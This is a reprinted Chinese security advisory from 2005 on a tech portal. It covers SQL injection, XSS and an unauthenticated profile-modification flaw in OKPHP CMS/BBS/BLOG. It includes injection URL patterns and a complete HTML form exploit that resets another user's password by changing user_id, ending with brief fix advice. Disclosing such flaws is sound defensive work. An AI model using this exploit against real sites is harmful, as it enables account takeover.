网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > PHP > PHP安全其它 > okphp系列产品的多个漏洞  

okphp系列产品的多个漏洞

2006-02-27  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

本文作者:SuperHei
文章性质:原创
发布日期:2005-08-14 网管网www_bitscn_com

程序描叙 网管联盟bitsCN@com

  OKPHP是由www.okphp.com开发一套专业的网站管理系统,目前产品包括:Okphp CMS, Okphp BBS,Okphp BLOG。由于对变量的过滤不严密及密码认证不严,导致sql注射,xss,隐藏变量post攻击从跨权限操作。 网管联盟bitsCN@com

漏洞攻击

网管联盟bitsCN@com

1、SQl注射及xss

网管u家u.bitsCN.com

  “几乎” 存在于各个变量里,如:forum.php

网管联盟bitsCN@com

http://www.xxx.com/forum.php?action=view_forum&forum_id={sql}
http://cn.okphp.com/forum.php?action=view_forum&forum_id='xss
.......

中国网管论坛bbs.bitsCN.com

2、隐藏变量post攻击

网管联盟bitsCN@com

  在提交request.php?action=user_modify 修改用户资料时,没有密码认证导致通过user_id修改容易用户密码及资料;

Exp: 网管u家u.bitsCN.com

<html>
<head>
<title>Okphp Discussions - powered by okphp BBS</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="bbs/themes/default/css/darkblue/css.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#CCCCCC" text="#000000">
<table class="forumline2" cellspacing="1" cellpadding="3" border="0">
<form name="form1" method="post" action="http://cn.okphp.com/forum.php" enctype="multipart/form-data">
<tr>
<th colspan="2" background="bbs/themes/default/images/darkblue/th_bg.gif">修改信息</th>
</tr>
<tr class="row1"> </tr>
<tr class="row2">
<td width="20%" valign="top" align="right">密码</td>

中国网管论坛bbs.bitsCN.com

<td width="80%">
<p>
<input type="password" name="password1" size="20">
重复输入
<input type="password" name="password2" size="20">
</p>
</td>
</tr>
<tr class="row2">
<td width="20%" valign="top" align="right" rowspan="2">头像地址</td>
<td width="80%">
<p>
<input type="text" name="headpic" size="80" value="http://cn.okphp.com/bbs/images/headp/836.gif">
<br>
宽度
<input type="text" name="h_width" size="3" value="0">
px,长度
<input type="text" name="h_height" size="3" value="0">
px (最大限制:100px)</p>
</td>
</tr>
<tr class="row2"> 中国网管论坛bbs.bitsCN.com
<td width="80%">
<input type="file" name="upfile">
</td>
</tr>
<tr class="row1">
<td width="20%" height="2" align="right">电子邮件</td>
<td width="80%" height="2">
<input type="text" name="email" size="20" value="ss@cc.com">
</td>
</tr>
<tr class="row2">
<td width="20%" valign="top" align="right">签名</td>
<td width="80%">
<p>
<textarea name="sig" cols="50" rows="5"></textarea>
</p>
</td>
</tr>
<tr class="row1">
<td width="20%" height="2" align="right">用户简介</td>
<td width="80%" height="2">
<textarea name="intr" cols="50" rows="5"></textarea> 网管u家u.bitscn@com
</td>
</tr>
<tr class="row2" align="center">
<td colspan="2" height="2">
<input type="hidden" name="action" value="user_modify">
<input type="hidden" name="step" value="2">
<input type="text" name="user_id" value="836">
<input type="hidden" name="md5pass" value="{md5pass}">
<input type="submit" name="Submit" value="Submit" class="catbutton">
</td>
</tr>
</form>
</table>
</body>
</html> 网管下载dl.bitscn.com

解决办法

网管u家u.bitscn@com

1、加强对变量过滤
2、增加密码认证
网管联盟bitsCN@com


TAGs   漏洞   多个   产品   系列   name   type   input   /td   td   width   class      
 上一篇:UPDATE注射(mysql+php)的两个模式   下一篇:世界上发现首例PHP病毒
相关文章列表
okphp系列产品的多个漏洞 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.Discuz插件漏洞攻击
2.简单PHP注入演示
3.两种Discuz网站漏洞的入侵方法
4.php 防注入
5.脚本安全和利用
6.phpMyAdmin远程PHP代码注入漏洞
7.PHP安全问题
8.对PHP漏洞进行攻击之狗尾续貂
9.CGI安全漏洞资料速查v1.0
10.关于php做社区网站的安全性
最新推荐文章:
1.两种Discuz网站漏洞的入侵方法
2.PHP Advanced Transfer Manager多个漏洞
3.phpMyAdmin远程PHP代码注入漏洞
4.通过对php一些服务器端特性的配置加强php
5.脚本安全和利用
6.通过对服务器端特性的配置加强php的安全
7.如何屏蔽掉phpinfo()函数
8.php 安全
9.php 防注入
10.CGI安全漏洞资料速查v1.0
网管论坛交流:
·不疯魔不成活
·令你大开眼界的真正标准化机房,已整理重
·华为HCSE OSPF路由协议培训教材 V3.0
·为赈灾,女孩舍身拍“裸照”
·Windows Server 2003服务器群集创建和配
·exchange2k3全套官方资料
·双儿一周岁了。。。特殊的礼物来啦。。
·存储备份技术版块守则
·无盘技术交流区守则
·DOS命令基础大全之命令详解<作者吐血